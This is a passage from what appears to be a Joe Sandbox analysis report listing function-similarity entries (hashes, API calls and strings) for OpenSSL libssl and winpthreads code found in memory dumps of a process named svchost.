                                                                                              • Opcode Fuzzy Hash: 848f00409a266f594c879187554ee4d88aa2be5f85c54d266ad7c43225f7afad
                                                                                              • Instruction Fuzzy Hash: 9361E6B1B0A69281E6668FB2E444B7A63A4FB95B80F06C135DEAD4B7A5DF3CD001C701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: NamedGroup: %s (%d)$UNKNOWN$key_exchange:
                                                                                              • API String ID: 1860387303-3646068821
                                                                                              • Opcode ID: 76076dc7cee3309c7be2a97947ebada04c6fc20c947832e566ac27cf6c87ad81
                                                                                              • Instruction ID: 0d07cbbab948d8bd6f4c98e0554ed26f713ed5f299f42f75122475756cdae1a8
                                                                                              • Opcode Fuzzy Hash: 76076dc7cee3309c7be2a97947ebada04c6fc20c947832e566ac27cf6c87ad81
                                                                                              • Instruction Fuzzy Hash: 0B41CFB1B1A2D282EA2BCB71D4255B96F51FB41780F05C032CEAD177A2DE3CE962D700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_saveR_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_port_raise_net_error$port failed due to network BIO I/O error$ssl\quic\quic_port.c
                                                                                              • API String ID: 3894926980-3295190829
                                                                                              • Opcode ID: a3e48a23d0d733174729af938e87b6f5c4ec20c892d9b2cf3c151f03377176a7
                                                                                              • Instruction ID: 3edaa611b67ed9f7856c343b9f17dcd1abad358f0446c6655e8eb64781a58971
                                                                                              • Opcode Fuzzy Hash: a3e48a23d0d733174729af938e87b6f5c4ec20c892d9b2cf3c151f03377176a7
                                                                                              • Instruction Fuzzy Hash: 8741B0A2A0AB8142EBA2CF35D550779A791AF45BD4F04D331DEAD07BF5CE2DE8408700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_server_cert_type
                                                                                              • API String ID: 193678381-2874584118
                                                                                              • Opcode ID: a2549dc68999e34ea9f448f7e483aa40c5777b7ca2383bf67dbbf2072c0924f3
                                                                                              • Instruction ID: a595a9ad6c74713a08f2f9b7883eba7d2dbc0ec807663c22be118cd541373aa9
                                                                                              • Opcode Fuzzy Hash: a2549dc68999e34ea9f448f7e483aa40c5777b7ca2383bf67dbbf2072c0924f3
                                                                                              • Instruction Fuzzy Hash: 1421BDE1A1A68281FA52DBB5D4513B923A0EF50784F00D035EEAD476F6EF2CE585C341
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$L_cleanse
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_release_record
                                                                                              • API String ID: 4083992426-1180888099
                                                                                              • Opcode ID: ce6f5598b709bcca41bbea653c1372b02795b9d4b4eeceb60e7cf642e6725302
                                                                                              • Instruction ID: f0e12c54d20e45821364d56a32877272944d10a5826e2df44bae82c9fa3f038b
                                                                                              • Opcode Fuzzy Hash: ce6f5598b709bcca41bbea653c1372b02795b9d4b4eeceb60e7cf642e6725302
                                                                                              • Instruction Fuzzy Hash: E73193A1E1A68281F7629B25E5443BC2361EF40784F548532EE2D47AB9CF3CE4D6C340
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flagsR_newR_set_debugR_vset_error
                                                                                              • String ID: $ossl_statem_server_read_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 3455785776-558299289
                                                                                              • Opcode ID: 5309a46375283aba9f8edbf05b48b0ae9d144b1539daf3d949c8e52d03f0505f
                                                                                              • Instruction ID: 92cec74b9b303d5b90300ec7fdd6cfd63411e36d02e1e91ed1a0c92677d2bbdd
                                                                                              • Opcode Fuzzy Hash: 5309a46375283aba9f8edbf05b48b0ae9d144b1539daf3d949c8e52d03f0505f
                                                                                              • Instruction Fuzzy Hash: 992181B1F0A14646FBA69B79D4813BD2791EF80784F488035CE6C4A6E6CF7DD8C58311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_maxfragmentlen
                                                                                              • API String ID: 476316267-3788999166
                                                                                              • Opcode ID: 7e4d5114516147d18e49989adc8dec87ee4ae1268be9232874c7db3ce5da3604
                                                                                              • Instruction ID: c368f4e47a82bcac8292f908259f17ed13aecb5b2fca0d6e2a52ebbd85f22337
                                                                                              • Opcode Fuzzy Hash: 7e4d5114516147d18e49989adc8dec87ee4ae1268be9232874c7db3ce5da3604
                                                                                              • Instruction Fuzzy Hash: 7E11B2E1A0A68282F7639BB1E8526FD2750EF50740F84C432DE2C437A2DE2CD5DAC710
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_new_nullL_sk_pushR_newR_set_debugR_set_error
                                                                                              • String ID: ssl\ssl_cert.c$ssl_cert_add0_chain_cert
                                                                                              • API String ID: 378185551-2634322016
                                                                                              • Opcode ID: 00f0f72a073b363657b12c8ebfdd79dfed386b1c4b339f38e259dc3f9435ebfd
                                                                                              • Instruction ID: 87e9c23a61256ca56aaf60e54e9b8070422fd6d92482dfd505c422836c575749
                                                                                              • Opcode Fuzzy Hash: 00f0f72a073b363657b12c8ebfdd79dfed386b1c4b339f38e259dc3f9435ebfd
                                                                                              • Instruction Fuzzy Hash: D81196B2E1F64285FB529F35E8422BD33A4EF44B80F188436DE6D47BA6DE3CE4458600
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB49425E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB494276
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • EVP_MD_CTX_copy_ex.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB49429F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB4942A8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB4942C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_copy_ex
                                                                                              • String ID: ssl\statem\statem_lib.c$tls13_restore_handshake_digest_for_pha
                                                                                              • API String ID: 3076243290-100768352
                                                                                              • Opcode ID: 44c5da9a5be5b51cd41812c578017f2e6ff4d75699e91a16c019f407d749e792
                                                                                              • Instruction ID: 1042e392715a135cc6b29d32d885e35b76d67a68e1366c3653ada29531a06ab0
                                                                                              • Opcode Fuzzy Hash: 44c5da9a5be5b51cd41812c578017f2e6ff4d75699e91a16c019f407d749e792
                                                                                              • Instruction Fuzzy Hash: 02015EE1F5A14282F763E7B3D8926FD1350AF84784F448432DE2C876B2EE5DA5CA8351
                                                                                              APIs
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB42491C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB42493D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424955
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424966
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424983
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_errorY_freeY_get_security_bits
                                                                                              • String ID: SSL_CTX_set0_tmp_dh_pkey$ssl\ssl_lib.c
                                                                                              • API String ID: 2486296959-372487106
                                                                                              • Opcode ID: be368217df21468efe549bbf785b2292c2266767b1b91b78b802f847ddedc9c1
                                                                                              • Instruction ID: 382b2cf0b55689654126cc5817c39f67e83c2f0b9d231ac8f7c8eeb3e66b1cbd
                                                                                              • Opcode Fuzzy Hash: be368217df21468efe549bbf785b2292c2266767b1b91b78b802f847ddedc9c1
                                                                                              • Instruction Fuzzy Hash: 9E01B5B2B0998181E752D735F9826FD6360DB947C4F548031EE6C83BB6DE2CD4458700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$L_sk_new_nullL_sk_pushR_set_debug
                                                                                              • String ID: ssl3_ctx_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 2439357478-173183182
                                                                                              • Opcode ID: 8e858106f05d7818566d941f3b10bfd3f940c0e90e5c8d6d87b27b6a6b9ba9dc
                                                                                              • Instruction ID: 2a205a5819c6b61bb793590dd653fdc073225d3d70127e988eed9fa12ef43d51
                                                                                              • Opcode Fuzzy Hash: 8e858106f05d7818566d941f3b10bfd3f940c0e90e5c8d6d87b27b6a6b9ba9dc
                                                                                              • Instruction Fuzzy Hash: DBF067F0E0F60342FE63A772E4432B96341AF10784F04C436EC2C4A6E6EE2CE8854201
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_test_flags$O_get_retry_reasonR_peek_error
                                                                                              • String ID:
                                                                                              • API String ID: 265086535-0
                                                                                              • Opcode ID: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                              • Instruction ID: 0bab99fded017d6f981207ad0769c20e7ab421051aabaab2f86b6bbbed3bc8a6
                                                                                              • Opcode Fuzzy Hash: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                              • Instruction Fuzzy Hash: DA9161B1E5E14282FEA68A39E14163D3398EF44B84F588531EE6D877A9DE1CEC819701
                                                                                              APIs
                                                                                              • WaitForMultipleObjects.KERNEL32 ref: 64941EE9
                                                                                              • WaitForSingleObject.KERNEL32 ref: 64941F23
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFBCB73F230,00007FFBCB73FAA0,00000068,?,649421DE,?,?,6494246F), ref: 64941F82
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFBCB73F230,00007FFBCB73FAA0,00000068,?,649421DE,?,?,6494246F), ref: 6494209A
                                                                                              • ResetEvent.KERNEL32 ref: 649420FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Wait$ObjectSingle$EventMultipleObjectsReset
                                                                                              • String ID:
                                                                                              • API String ID: 654736092-0
                                                                                              • Opcode ID: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                                                                                              • Instruction ID: d3ee0eaab07988580939ca2428ce104d4a652107eb983c9cf61b1eb5acf66ab1
                                                                                              • Opcode Fuzzy Hash: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                                                                                              • Instruction Fuzzy Hash: 665114223D440041F7214667E94A3AA0A5FBB577ECF5401A2CF26CA6A1FBBDC5D2C226
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_num$L_sk_findL_sk_valueL_strnlenmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2509952571-0
                                                                                              • Opcode ID: 03bc5eeada43cb13ffff46621ef564d7c29dbb84ccef4da5ce24b09471ca130c
                                                                                              • Instruction ID: 60e88d51e0f449359601cd073c7e049840cb328ae19f56aa943495c5056010bc
                                                                                              • Opcode Fuzzy Hash: 03bc5eeada43cb13ffff46621ef564d7c29dbb84ccef4da5ce24b09471ca130c
                                                                                              • Instruction Fuzzy Hash: F0419FA2B0F65281EA669A27D94463E6F84EF41BD0F48C435EE2D977A5DF3CE441D300
                                                                                              APIs
                                                                                                • Part of subcall function 64942170: EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                                                                                                • Part of subcall function 64942170: LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                                                                                              • TryEnterCriticalSection.KERNEL32 ref: 64942287
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 649422C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                                                                                              • Instruction ID: c70b7dd98fa8b30a946d7bfc7cacc3f56c823bbf88279334903176617df7d1a3
                                                                                              • Opcode Fuzzy Hash: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                                                                                              • Instruction Fuzzy Hash: 17318C2238060486EB149F76E9507DA2365BB86FECF884732CD69973E4DF35C859C351
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 64947015
                                                                                              • GetThreadTimes.KERNEL32 ref: 64947037
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64947080
                                                                                              • GetProcessTimes.KERNEL32 ref: 649470A2
                                                                                              • _errno.MSVCRT ref: 649470AC
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649470CC
                                                                                              • QueryPerformanceFrequency.KERNEL32 ref: 649470F5
                                                                                              • QueryPerformanceCounter.KERNEL32 ref: 64947104
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentPerformanceProcessQueryThreadTimeTimes$CounterFileFrequencySystem_errno
                                                                                              • String ID:
                                                                                              • API String ID: 3786581644-0
                                                                                              • Opcode ID: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                                                                                              • Instruction ID: 1c768bd9e69684d563be0dbbaa5e68889a0c424e9680141303368067254932ee
                                                                                              • Opcode Fuzzy Hash: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                                                                                              • Instruction Fuzzy Hash: A2318372755B8883DF09EF61E81036AB366FBD5B88F509126EA9A4B758EF3DC014C740
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4951A7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4951BF
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB495242
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB49525A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_get_message_header
                                                                                              • API String ID: 193678381-1127185309
                                                                                              • Opcode ID: 8f0f2f9a1f104ec38d508048ab7801bae8aebf32c6308166d000d658e4fcaa8e
                                                                                              • Instruction ID: f1ee16a66b92000932e657ecf5a4128b8cca4dabe9d6799109b758dae4b55e78
                                                                                              • Opcode Fuzzy Hash: 8f0f2f9a1f104ec38d508048ab7801bae8aebf32c6308166d000d658e4fcaa8e
                                                                                              • Instruction Fuzzy Hash: 50616CB2A0978286EB62CF75E4903BD37A0FB44B48F188036DFAD47665DF38E4518B11
                                                                                              APIs
                                                                                              Strings
                                                                                              • Assertion failed: (%s), file %s, line %d, xrefs: 64941628
                                                                                              • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c, xrefs: 64941616
                                                                                              • (((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0), xrefs: 64941621
                                                                                              • &, xrefs: 6494160E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func
                                                                                              • String ID: &$(((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c$Assertion failed: (%s), file %s, line %d
                                                                                              • API String ID: 686374508-3470151808
